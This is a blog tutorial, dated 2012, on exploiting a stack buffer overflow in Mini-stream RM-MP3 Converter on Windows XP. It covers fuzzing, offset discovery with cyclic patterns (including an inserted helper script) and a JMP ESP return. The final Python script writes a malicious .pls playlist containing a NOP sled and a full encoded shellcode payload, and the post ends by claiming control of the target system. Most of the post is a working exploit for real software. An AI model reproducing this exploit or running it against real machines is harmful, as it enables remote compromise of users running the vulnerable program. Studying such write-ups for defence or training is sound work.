Sunday, 12 February 2012

Buffer Overflow Mini-stream RM-MP3 Converter with Direct Return (Part 2)

Tools used:
1. Mini-stream RM-MP3 Converter
2. OllyDbg (installed on the victim) and the BT tool (Terminator)
3. Windows XP
4. Pattern_Create
5. Metasploit Framework
6. Pattern_Offset
First we specify the attack pattern. The application can open audio files with these extensions:


Then we write a fuzzer script for Mini-stream RM-MP3 Converter:

# Fuzzer: write a .pls playlist whose URL is followed by 20000 'A' bytes
filename="kuza.pls"
fly=b'rtsp://.'+b'\x41' * 20000    # 0x41 is 'A'
f=open(filename,'wb')              # binary mode so the raw bytes are written unchanged
f.write(fly)
f.close()

Then we open the RM-MP3 converter in OllyDbg and load the file. The crash overwrites some registers, among them ESP and EIP. The screenshot:

EIP is overwritten. Now I add a cyclic string pattern generated with Metasploit's pattern_create, with the command:

To copy the contents of kuza_string.txt, run cat kuza_string.txt and paste the output into the script, replacing the value of fly ('\x41' * 20000) with the generated pattern.
Close OllyDbg and the RM-MP3 converter, restart both, and note the pattern values that now appear in the registers.


EIP is overwritten with the value 36695735, which means EIP is overwritten at byte 17417 of the pattern.

ESP holds the value i8Wi9, which means ESP is overwritten at byte 17425 of the pattern.
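The two offsets above come from Metasploit's pattern_create and pattern_offset. As an added example that is not part of the original post, here is a small stand-alone version of the same cyclic-pattern triage step: it builds the Aa0Aa1Aa2... pattern with the same upper/lower/digit layout Metasploit uses, converts a register value as OllyDbg shows it (little-endian, so 36695735 is the bytes "5Wi6") back into text, and looks up where that text sits in the pattern. The function names and the 20000-byte length are this example's own choices; the offsets are relative to the start of the pattern, not to the 'rtsp://' prefix in front of it.

```python
# Added example (not the original post's code): cyclic pattern create/offset,
# used to map a register value seen in the debugger to a byte offset in the
# input. Pattern layout (upper, lower, digit triplets) matches Metasploit's.
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def full_cycle():
    """One full cycle of the pattern: Aa0Aa1...Zz9 (26*26*10*3 = 20280 bytes).
    Inside one cycle every 4-byte window is unique, which is what makes the
    lookup unambiguous."""
    return "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern,
    repeating the cycle if `length` exceeds one cycle."""
    cycle = full_cycle()
    reps = length // len(cycle) + 1
    return (cycle * reps)[:length]


def reg_to_text(hex_value):
    """Turn a 32-bit register value as a debugger shows it (e.g. '36695735')
    into the 4 ASCII bytes that were written into it. x86 is little-endian,
    so the displayed value is the bytes in reverse order."""
    if len(hex_value) != 8 or any(c not in string.hexdigits for c in hex_value):
        raise ValueError("expected 8 hex digits, got %r" % hex_value)
    return bytes.fromhex(hex_value)[::-1].decode("ascii")


def pattern_offset(needle, length=20000):
    """Offset of `needle` (text as seen in memory, e.g. 'i8Wi9') within a
    pattern of `length` bytes, or -1 if it does not occur."""
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # Values taken from the crash described in the post
    eip_text = reg_to_text("36695735")
    print("EIP bytes:", eip_text, "-> offset", pattern_offset(eip_text))
    print("ESP bytes: i8Wi9 -> offset", pattern_offset("i8Wi9"))
```

Run as a script it reports offset 17417 for EIP and 17425 for ESP, the same numbers the post obtains from pattern_offset; a -1 result would mean the register was not filled from the pattern at all (for example, because it came from a copy of the input rather than the input itself).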

We delete the pattern string ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7A....) and replace it with "\x90" * xxxx, where xxxx is the EIP offset found above.
example of my script:

# Pad up to the EIP offset with NOPs (0x90), then write 4 marker bytes
# that will land in EIP to confirm we control the return address
filename="kuza.pls"
fly=b"rtsp://"+b"\x90" * 17417
fly+= b"\xAD\xED\xEF\xBE"     # shows up in EIP as 0xBEEFEDAD (little-endian)
f=open(filename,'wb')          # binary mode so the bytes are written unchanged
f.write(fly)
f.close()


As said, close the application, then open OllyDbg and run the RM-MP3 converter inside it.
Example of my script:

# Same as before, but fill the rest of the 20000 bytes with INT3 (0xCC) so
# execution stops in the debugger if control lands anywhere in the padding
filename="kuza.pls"
fly=b'rtsp://'+b'\x90' * 17417
fly+= b'\xAD\xED\xEF\xBE'             # marker that lands in EIP
fly+= b'\x90' * (17417-len(fly))      # len(fly) is already 17428 (7 + 17417 + 4), so this adds nothing
fly+= b'\xCC' * (20000-len(fly))      # INT3 padding up to 20000 bytes
f=open(filename,'wb')                 # binary mode so the bytes are written unchanged
f.write(fly)
f.close()



Below is the OllyDbg picture of the RM-MP3 converter before running; we search for a JMP ESP instruction to use as a springboard:

Then we replace ('\xAD\xED\xEF\xBE') in the script with ('\xDB\xB3\xA4\x7C'), the JMP ESP address 0x7CA4B3DB written little-endian.
example of my script:


# The marker is replaced by the JMP ESP address so that, on return, execution
# jumps to ESP, which points into our INT3 padding
filename="kuza.pls"
fly=b'rtsp://'+b'\x90' * 17417
fly+= b'\xDB\xB3\xA4\x7C'             # JMP ESP at 0x7CA4B3DB (little-endian)
fly+= b'\x90' * (17417-len(fly))      # adds nothing here (see previous script)
fly+= b'\xCC' * (20000-len(fly))      # INT3 padding; the debugger breaks here after JMP ESP
f=open(filename,'wb')                 # binary mode so the bytes are written unchanged
f.write(fly)
f.close()


The end result, my final script:


# Final file: NOP padding up to EIP, the JMP ESP address, a short NOP sled
# at ESP, then the shellcode that JMP ESP lands on
filename="kuza.pls"
fly=b'rtsp://'+b'\x90' * 17417
fly+= b'\xDB\xB3\xA4\x7C'             # JMP ESP at 0x7CA4B3DB (little-endian)
fly+= b'\x90' * 32                    # NOP sled at ESP
fly+= (b"\xb8\x71\x8b\xf7\x2c\x31\xc9\xb1\x51\xdb\xd2\xd9\x74\x24\xf4\x5b"   # shellcode payload
b"\x31\x43\x0e\x03\x43\x0e\x83\xb2\x8f\x15\xd9\xc8\xfa\x32\x6f\xd8"
b"\x02\x3b\x8f\xe7\x95\x4f\x1c\x33\x72\xdb\x98\x07\xf1\xa7\x27\x0f"
b"\x04\xb7\xa3\xa0\x1e\xcc\xeb\x1e\x1e\x39\x5a\xd5\x14\x36\x5c\x07"
b"\x65\x88\xc6\x7b\x02\xc8\x8d\x84\xca\x03\x60\x8b\x0e\x78\x8f\xb0"
b"\xda\x5b\x58\xb3\x07\x28\xc7\x1f\xc9\xc4\x9e\xd4\xc5\x51\xd4\xb5"
b"\xc9\x64\x01\x4a\xde\xed\x5c\x20\x3a\xee\x3f\x7b\x73\xd5\xa4\xf0"
b"\x37\xd9\xaf\x46\xb4\x92\xc0\x5a\x69\x2f\x60\x6a\x2f\x58\xef\x24"
b"\xc1\x74\xbf\x47\x0b\xe2\x13\xd1\xdc\xd8\xa1\x75\x6a\x6c\xf4\xda"
b"\xc0\x6d\x28\x8c\x23\x7c\x35\x77\xe4\x80\x10\xd8\x8d\x9a\xfb\x67"
b"\x60\x6c\x06\x32\x11\x6f\xf9\x6c\x8d\xb6\x0c\x79\xe3\x1e\xf0\x57"
b"\xaf\xf3\x5d\x04\x03\xb7\x32\xe9\xf0\xc8\x65\x8b\x9e\x27\xda\x35"
b"\x0c\xc1\x03\x2c\xda\x75\xd9\x3e\xdc\x21\x21\x68\x88\xdd\x8c\xc1"
b"\xb2\x0e\x46\x4d\xe1\x81\x7e\xda\x05\x0b\xd3\xb1\x06\x64\xbc\xdc"
b"\xb0\x03\x74\x49\xbc\xda\xd7\x21\x16\xb6\x28\x19\x05\x50\x30\xe0"
b"\xec\xd8\xe9\xed\x27\x4f\xe9\xc1\xae\x1a\x71\x87\x46\xb8\x14\xce"
b"\x72\x54\xb7\x89\x55\x65\xbe\xce\xcc\x31\x48\xf2\x20\x7a\xb9\x58"
b"\xbc\x38\x13\x62\x03\x91\xf8\x17\xfe\xd1\x55\x8c\x54\x49\xd8\x2c"
b"\x19\x9c\xe3\xa5\x1a\x5e\xcd\x1e\xf4\xf2\xa3\xf1\xab\x98\x42\xa0"
b"\x1a\x08\x14\xbd\x4d\xda\x3b\x98\x6b\xd5\x17\xe5\xa2\x83\x68\xe6"
b"\x7c\xab\x47\x93\xd4\xaf\xeb\x67\xbe\xb0\x3a\x35\xc0\x9f\xab\xc7"
b"\xe6\xc2\x5f\x64\xe8\xd5\x5f\x5a")
f=open(filename,'wb')                 # binary mode so the bytes are written unchanged
f.write(fly)
f.close()
Result image (RM-MP3 converter):



Then we test whether we can control the system, with the command:

I successfully exploited the Mini-stream RM-MP3 Converter application..(^_^)..
(......................Good Luck for you.........................)
Warning: you do not have to use a Python program as I demonstrated; you can use Perl, Ruby, or Java, depending on your attack pattern.
